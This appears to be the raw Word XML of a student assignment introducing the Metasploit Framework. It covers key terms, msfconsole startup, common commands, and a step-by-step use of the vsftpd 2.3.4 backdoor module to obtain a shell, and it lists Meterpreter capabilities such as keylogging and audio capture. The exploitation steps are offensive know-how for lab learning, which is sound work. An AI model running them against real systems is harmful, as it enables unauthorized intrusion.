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 xml:space="preserve">Assignment No-08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Introduction to Exploitation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29-07-25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0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Tools / Topic: Introduction to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="1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 xml:space="preserve">Metasploit Framework : </w:t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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source penetration testing platform that allows  to find, exploit, and validate vulnerabilities in systems. It's like a “hacker's Swiss Army knife” used by Cybersecurity professionals to test network and system defenses.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🔑 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="838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2"/>
        <w:gridCol w:w="7545"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7545" w:type="dxa"/>
            <w:tcBorders/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84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Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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Code that takes advantage of a vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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Code that runs on the target after exploitation (e.g., a reverse shell).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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The attacker’s machine that waits for the payload to connect back.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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 script/plugin in Metasploit. Can be exploits, scanners, payloads, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="842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Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="75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 communication link between attacker and victim (e.g., Meterpreter).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🔧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Let’s Start Metasploit on Kali Linux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Start PostgreSQL (Metasploit uses it)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hanging="0" w:left="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sudo systemctl start postgresql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Launch Metasploit Console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hanging="0" w:left="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msfconsole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🎯 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Common Metasploit Commands</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="586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33"/>
        <w:gridCol w:w="3629"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="223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Command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search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for exploit modules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use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Select a specific module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show options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View required options for a module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 parameters like RHOST, LHOST, etc.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exploit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 the exploit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sessions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List active sessions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sessions -i &lt;ID&gt;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Interact with a session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✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Example: Exploiting vsftpd 2.3.4 (Backdoor vulnerability)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1: Start Metasploit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msfconsole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2: Search the exploit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search vsftpd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3: Use the module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use exploit/unix/ftp/vsftpd_234_backdoor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4: Set target IP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set RHOSTS &lt;target-ip&gt;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5: Run the exploit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exploit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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>’ll get a shell if it’s successful!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🐚 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>What is Meterpreter?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Style w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an advanced, stealthy payload that gives a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target system. With Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> can: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Browse the target file system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Capture screenshots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Download/upload files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Open a keylogger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Record microphone audio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t xml:space="preserve">Let’s See some Demonstration : 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Step 1 : Start Metasploit-Framework [msfconsole]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1045" cy="48012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80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Step 2 :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Mono">
    <w:altName w:val="Courier New"/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ack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LibreOffice/25.2.3.2$Linux_X86_64 LibreOffice_project/520$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>5</Pages>
  <Words>313</Words>
  <Characters>1814</Characters>
  <CharactersWithSpaces>2098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2025-08-03T22:06:55Z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